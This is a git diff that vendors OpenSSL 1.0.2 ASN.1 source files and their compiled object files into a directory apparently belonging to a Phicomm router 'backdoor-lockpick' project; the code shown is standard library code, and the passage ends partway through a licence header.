+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <limits.h>
+#include "cryptlib.h"
+#include <openssl/buffer.h>
+#include <openssl/asn1_mac.h>
+
+static int asn1_d2i_read_bio(BIO *in, BUF_MEM **pb);
+
+#ifndef NO_OLD_ASN1
+# ifndef OPENSSL_NO_FP_API
+
+void *ASN1_d2i_fp(void *(*xnew) (void), d2i_of_void *d2i, FILE *in, void **x)
+{
+    BIO *b;
+    void *ret;
+
+    if ((b = BIO_new(BIO_s_file())) == NULL) {
+        ASN1err(ASN1_F_ASN1_D2I_FP, ERR_R_BUF_LIB);
+        return (NULL);
+    }
+    BIO_set_fp(b, in, BIO_NOCLOSE);
+    ret = ASN1_d2i_bio(xnew, d2i, b, x);
+    BIO_free(b);
+    return (ret);
+}
+# endif
+
+void *ASN1_d2i_bio(void *(*xnew) (void), d2i_of_void *d2i, BIO *in, void **x)
+{
+    BUF_MEM *b = NULL;
+    const unsigned char *p;
+    void *ret = NULL;
+    int len;
+
+    len = asn1_d2i_read_bio(in, &b);
+    if (len < 0)
+        goto err;
+
+    p = (unsigned char *)b->data;
+    ret = d2i(x, &p, len);
+ err:
+    if (b != NULL)
+        BUF_MEM_free(b);
+    return (ret);
+}
+
+#endif
+
+void *ASN1_item_d2i_bio(const ASN1_ITEM *it, BIO *in, void *x)
+{
+    BUF_MEM *b = NULL;
+    const unsigned char *p;
+    void *ret = NULL;
+    int len;
+
+    len = asn1_d2i_read_bio(in, &b);
+    if (len < 0)
+        goto err;
+
+    p = (const unsigned char *)b->data;
+    ret = ASN1_item_d2i(x, &p, len, it);
+ err:
+    if (b != NULL)
+        BUF_MEM_free(b);
+    return (ret);
+}
+
+#ifndef OPENSSL_NO_FP_API
+void *ASN1_item_d2i_fp(const ASN1_ITEM *it, FILE *in, void *x)
+{
+    BIO *b;
+    char *ret;
+
+    if ((b = BIO_new(BIO_s_file())) == NULL) {
+        ASN1err(ASN1_F_ASN1_ITEM_D2I_FP, ERR_R_BUF_LIB);
+        return (NULL);
+    }
+    BIO_set_fp(b, in, BIO_NOCLOSE);
+    ret = ASN1_item_d2i_bio(it, b, x);
+    BIO_free(b);
+    return (ret);
+}
+#endif
+
+#define HEADER_SIZE   8
+static int asn1_d2i_read_bio(BIO *in, BUF_MEM **pb)
+{
+    BUF_MEM *b;
+    unsigned char *p;
+    int i;
+    ASN1_const_CTX c;
+    size_t want = HEADER_SIZE;
+    int eos = 0;
+    size_t off = 0;
+    size_t len = 0;
+
+    b = BUF_MEM_new();
+    if (b == NULL) {
+        ASN1err(ASN1_F_ASN1_D2I_READ_BIO, ERR_R_MALLOC_FAILURE);
+        return -1;
+    }
+
+    ERR_clear_error();
+    for (;;) {
+        if (want >= (len - off)) {
+            want -= (len - off);
+
+            if (len + want < len || !BUF_MEM_grow_clean(b, len + want)) {
+                ASN1err(ASN1_F_ASN1_D2I_READ_BIO, ERR_R_MALLOC_FAILURE);
+                goto err;
+            }
+            i = BIO_read(in, &(b->data[len]), want);
+            if ((i < 0) && ((len - off) == 0)) {
+                ASN1err(ASN1_F_ASN1_D2I_READ_BIO, ASN1_R_NOT_ENOUGH_DATA);
+                goto err;
+            }
+            if (i > 0) {
+                if (len + i < len) {
+                    ASN1err(ASN1_F_ASN1_D2I_READ_BIO, ASN1_R_TOO_LONG);
+                    goto err;
+                }
+                len += i;
+            }
+        }
+        /* else data already loaded */
+
+        p = (unsigned char *)&(b->data[off]);
+        c.p = p;
+        c.inf = ASN1_get_object(&(c.p), &(c.slen), &(c.tag), &(c.xclass),
+                                len - off);
+        if (c.inf & 0x80) {
+            unsigned long e;
+
+            e = ERR_GET_REASON(ERR_peek_error());
+            if (e != ASN1_R_TOO_LONG)
+                goto err;
+            else
+                ERR_clear_error(); /* clear error */
+        }
+        i = c.p - p;            /* header length */
+        off += i;               /* end of data */
+
+        if (c.inf & 1) {
+            /* no data body so go round again */
+            eos++;
+            if (eos < 0) {
+                ASN1err(ASN1_F_ASN1_D2I_READ_BIO, ASN1_R_HEADER_TOO_LONG);
+                goto err;
+            }
+            want = HEADER_SIZE;
+        } else if (eos && (c.slen == 0) && (c.tag == V_ASN1_EOC)) {
+            /* eos value, so go back and read another header */
+            eos--;
+            if (eos <= 0)
+                break;
+            else
+                want = HEADER_SIZE;
+        } else {
+            /* suck in c.slen bytes of data */
+            want = c.slen;
+            if (want > (len - off)) {
+                want -= (len - off);
+                if (want > INT_MAX /* BIO_read takes an int length */  ||
+                    len + want < len) {
+                    ASN1err(ASN1_F_ASN1_D2I_READ_BIO, ASN1_R_TOO_LONG);
+                    goto err;
+                }
+                if (!BUF_MEM_grow_clean(b, len + want)) {
+                    ASN1err(ASN1_F_ASN1_D2I_READ_BIO, ERR_R_MALLOC_FAILURE);
+                    goto err;
+                }
+                while (want > 0) {
+                    i = BIO_read(in, &(b->data[len]), want);
+                    if (i <= 0) {
+                        ASN1err(ASN1_F_ASN1_D2I_READ_BIO,
+                                ASN1_R_NOT_ENOUGH_DATA);
+                        goto err;
+                    }
+                    /*
+                     * This can't overflow because |len+want| didn't
+                     * overflow.
+                     */
+                    len += i;
+                    want -= i;
+                }
+            }
+            if (off + c.slen < off) {
+                ASN1err(ASN1_F_ASN1_D2I_READ_BIO, ASN1_R_TOO_LONG);
+                goto err;
+            }
+            off += c.slen;
+            if (eos <= 0) {
+                break;
+            } else
+                want = HEADER_SIZE;
+        }
+    }
+
+    if (off > INT_MAX) {
+        ASN1err(ASN1_F_ASN1_D2I_READ_BIO, ASN1_R_TOO_LONG);
+        goto err;
+    }
+
+    *pb = b;
+    return off;
+ err:
+    if (b != NULL)
+        BUF_MEM_free(b);
+    return -1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_d2i_fp.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_d2i_fp.o
new file mode 100644
index 0000000000000000000000000000000000000000..29a5af607a3bcb55730f35256e8e52e3af489504
GIT binary patch
literal 4376
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_digest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_digest.c
new file mode 100644
index 0000000..7cbc475
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_digest.c
@@ -0,0 +1,111 @@
+/* crypto/asn1/a_digest.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <time.h>
+
+#include "cryptlib.h"
+
+#ifndef NO_SYS_TYPES_H
+# include <sys/types.h>
+#endif
+
+#include <openssl/err.h>
+#include <openssl/evp.h>
+#include <openssl/buffer.h>
+#include <openssl/x509.h>
+
+#ifndef NO_ASN1_OLD
+
+int ASN1_digest(i2d_of_void *i2d, const EVP_MD *type, char *data,
+                unsigned char *md, unsigned int *len)
+{
+    int i;
+    unsigned char *str, *p;
+
+    i = i2d(data, NULL);
+    if ((str = (unsigned char *)OPENSSL_malloc(i)) == NULL) {
+        ASN1err(ASN1_F_ASN1_DIGEST, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+    p = str;
+    i2d(data, &p);
+
+    if (!EVP_Digest(str, i, md, len, type, NULL))
+        return 0;
+    OPENSSL_free(str);
+    return (1);
+}
+
+#endif
+
+int ASN1_item_digest(const ASN1_ITEM *it, const EVP_MD *type, void *asn,
+                     unsigned char *md, unsigned int *len)
+{
+    int i;
+    unsigned char *str = NULL;
+
+    i = ASN1_item_i2d(asn, &str, it);
+    if (!str)
+        return (0);
+
+    if (!EVP_Digest(str, i, md, len, type, NULL))
+        return 0;
+    OPENSSL_free(str);
+    return (1);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_digest.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_digest.o
new file mode 100644
index 0000000000000000000000000000000000000000..bb8bcdf5894ab3780f872fbfb59a0422ba4ded42
GIT binary patch
literal 2600
zcmbuAO>7%Q6oAJ+X^d#5E^x5a7WrT*Bk0PTfG9r#uYcmT*fy187lpPgj=lL&?KrI0
zq6G;KQ4pgv5H8#}Q?8t<9>7wlsv@M`S}sTkAp`=6phy)UB=g?vOuAXGFYu)CoB8&=
zH*e<6jNdI9)8SBvNC}Y_$^DU}gj_vvzn|sZETLqA>>hgbZ|#*b8|dt=cDBs!srR(n
zDRx7vmf1J8S$*xdbW`7mK9&X_ofT3EwXd^kDy9wYUauhAd>W&%n{4}M>=+wHDyFaZ
zd&i1uU%ho*1NOx=`1x`Iez=L+|MhvD-7wf~ebY(BF=`yb71djMWA_x>G1xB#`$1>F
zbL;iKGa>ueaAo?&`Bb8*PaWksIb+;PU;8S3?t*q+yP&<MncI9-wKDq)R>c=%u&-e~
zvpU;_6~*_hD26NgNxvCQL2x%iedC3czCP$hA=TqNubndc*3C;M^&=Yb!CqFefUM%@
zFsbdj*<4<<x{lHyq?FG;mrU2@dn-;a`K&UfWKO8h^!QMHXELK?o_gHHm`@a19NHMP
z(&-ur6VgW(frj#kt4Qdr3JG0`hmIT^k8Qy=6@VWV-|nEErtuHMI!$~KDbeI+v`Eue
z#tJm^-T{rCTpKUY*TYxoNsVSSn$FQ=jwW(6o};lR!L=#kd?ey*hF_+MD;Q@jTB4b7
zizYQ`FHDCNRxV2Z7z}*?5D7f7$mJ^cdqw!J>}NQN@LdYx<HL~K$42l6hWJ5FunNNx
zA)d=6J|71CkY`=I2EdL%!+QE<3P2FY`xC@xM(|fh@P!flP2iZP%#YU?*!v^wiRUCM
zMm|Hd+0&{x+{7#yGdayLXQroTi&e9#<&2_9@|C$W)fuy0Z?!rNQmj<W)t+Now%xHw
z@$4D1z;A{$Td*yQm}b|hH!hlurHkf5eYxe%vg}xGITfFlgXKv)pLu8~a6brE@1KDy
z20{?LGx!2Y-a!b0oI;cQ6NDhh4?&asGlU?>u^y6dBLqQ?HJAJ_9(WMs4?~lD(!;&+
zU-EEo{5cQz#!o^_6kIPhDNCXwxvVQux|iEdeIB%9yLw6XY^zmQ9P5%plxE$j6J@^J
zC5qj_0h+6dN|Z*Y-L_W1WToR+3Oq$8c!|V#aiyoM+MQL)b}oY}2DFyU1-st1WM=<Q
zC&3-J!hh4Uz)%*&KDi^;R`yXJfrhonLi0*YT<IMF9|Vn|<jar{{J7x$7wJ>qyu#db
z^Id}PD8~G+{wnz5RFlxWBIn1vy&}_+Itw4MpYa+&|8rsRgpW%<smt(P_PwUx1;GH@
zIbiq-d(SGy`Cj-Zao`cT{}R0c9W?d(ORyykh4%ZmfCtt8Pf>rlFSw8Ren@{=|G>Gy
vZc8L2*Ma{N7{l+6G5xg%L{>2=kdIxp_v_zQy!%1^X>lRm-t%-je*b>~A!2P!

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_dup.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_dup.c
new file mode 100644
index 0000000..349ab56
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_dup.c
@@ -0,0 +1,117 @@
+/* crypto/asn1/a_dup.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+
+#ifndef NO_OLD_ASN1
+
+void *ASN1_dup(i2d_of_void *i2d, d2i_of_void *d2i, void *x)
+{
+    unsigned char *b, *p;
+    const unsigned char *p2;
+    int i;
+    char *ret;
+
+    if (x == NULL)
+        return (NULL);
+
+    i = i2d(x, NULL);
+    b = OPENSSL_malloc(i + 10);
+    if (b == NULL) {
+        ASN1err(ASN1_F_ASN1_DUP, ERR_R_MALLOC_FAILURE);
+        return (NULL);
+    }
+    p = b;
+    i = i2d(x, &p);
+    p2 = b;
+    ret = d2i(NULL, &p2, i);
+    OPENSSL_free(b);
+    return (ret);
+}
+
+#endif
+
+/*
+ * ASN1_ITEM version of dup: this follows the model above except we don't
+ * need to allocate the buffer. At some point this could be rewritten to
+ * directly dup the underlying structure instead of doing and encode and
+ * decode.
+ */
+
+void *ASN1_item_dup(const ASN1_ITEM *it, void *x)
+{
+    unsigned char *b = NULL;
+    const unsigned char *p;
+    long i;
+    void *ret;
+
+    if (x == NULL)
+        return (NULL);
+
+    i = ASN1_item_i2d(x, &b, it);
+    if (b == NULL) {
+        ASN1err(ASN1_F_ASN1_ITEM_DUP, ERR_R_MALLOC_FAILURE);
+        return (NULL);
+    }
+    p = b;
+    ret = ASN1_item_d2i(NULL, &p, i, it);
+    OPENSSL_free(b);
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_dup.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_dup.o
new file mode 100644
index 0000000000000000000000000000000000000000..c5a7de04f35a6f95aa3693e283d616a7b616b587
GIT binary patch
literal 2568
zcmbu9;fotZ6u>9RosG5K#wr*%IU+=f*juvKE24sAlgr%()?T?wq{WtHFWK~tCYN)w
zfwYQ($BD~%P!RtBzxcrq{sBeoffeyvv5M`tekj<|f{I$CD)GJ9dEDG)17aV{zM0>=
z_vY=qnR&Nt&c$OfMiOJMvfU9;#y)stw_o7h0#n#Q_S>P!2YOAfR{Za4OUA~%T*KHJ
zdo~9ahCiE4Ydgl~cV5@<|El<Z82*pi{lT?MCeCgj!zkPR{kKsY{@2FlPH(cT?P%X#
z(t&*0fzRcG@F{DzxXs-orvH<%?PZe~Iytze4Gh1PO(9Ad^{e{e2gCol;$I0OZo%>m
z<7kkKHy*%^D>>7@`NkRjw0`ER-Q0hV%={Zz1=eTA=6&z9;XkPO|M2A@4Ia(hYCtaa
ztFLX|>P<+QU#85t)!k<xPfXGD@0flgn+h`7dOMr^FS+teZL85+SL=+;mr5^Za<%2&
zn%B#`q#jlCQ`(C?KGfcs&a3&E=L3v+ql`gIK^uoQf4s)xjO`#xKtp*lP%L&~k;VF{
z*u;T-$%}9RW`I8}=Dt8Zr=+&yMJ4@VVphq#Kc*|WjqzFKMEnya2S8WSMI}{Kl36gV
z3ct_x`pqka_(w{*%<Y89kixS!#(o_PO#nzlo=oKQH+#Jj{O|WN93}W}MDcyYklXWP
zFf^B7j}Ebb;BF5~f=QQ1Oe>%dOaI098rW0Nux??Q0uaSt8Nn+fcx?o40>^wP4_-rH
z-U$2mMsP+)Ry9j`rY{}W@CY+&-drf^rnN9Pw^XiLRlR7IEmm4Qb)vdpwe41`Q)lJH
zMQgq1S&r*=T$*dTj>9ag>)G{lR(<81)wEYzLEKf(Y4hNG6+T*>Zpd@fs|@!C1<pUO
z+TVjfN}LAw1RopXXC;m`BL1<&4@sQ%iS8TO|0&rYmh30RBa8NO{27TqA=&E^m)Ct=
z;&?7--3;_m@PDz9oD?16RA;7k&$m5$8MNmHdWCwf)3R01>3d9V*q+VQ<!+a$ZU+Zw
zuBjSR>z#JnSp$=`j_0WG)J*YOiSgOBp1SUK)*aV753U%{S+Sa~-F7ImhtnBw$E^t8
zumUiYrr4)o6xdQ9^#nAmMFE;Dw-JK;5-9c<XbeR!LR#?W1P{MNpN7^I=F*K1$PrK&
z^Z)v5;EPL5Lz9Kpr+jIS(jr}e3GC;|K<Lkf!3!Zyex&i8p}uT-BML^?o&tuiuY6W9
z&Q0N;!GR><|9KPU&@}8%pfCAiH|*a67FGZ2;wh(n!TRGHPyST@$hE<)FA}2vH~<V|
kg#9sQxb}e9Npb!z;y{w{wmuGXQT|DBA>NXFu^aaP7qH}D2><{9

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_enum.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_enum.c
new file mode 100644
index 0000000..c3498ac
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/a_enum.c
@@ -0,0 +1,181 @@
+/* crypto/asn1/a_enum.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
